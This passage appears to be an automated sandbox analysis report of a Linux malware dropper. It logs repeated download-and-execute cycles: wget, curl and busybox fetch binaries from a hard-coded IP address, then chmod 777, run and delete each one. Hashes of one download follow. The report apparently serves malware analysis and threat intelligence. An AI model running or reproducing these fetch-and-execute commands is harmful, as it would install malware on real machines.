/bin/rmrm MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵PID:941
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵PID:943
-
-
/bin/chmodchmod 777 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c./T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵PID:946
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵PID:949
-
-
/bin/chmodchmod 777 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F./LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵PID:955
-
-
/bin/chmodchmod 777 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6./rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵PID:961
-
-
/bin/chmodchmod 777 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt./LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵PID:967
-
-
/bin/chmodchmod 777 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL./PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵PID:973
-
-
/bin/chmodchmod 777 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG./5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵PID:976
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵PID:977
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵PID:979
-
-
/bin/chmodchmod 777 PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx./PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵PID:982
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97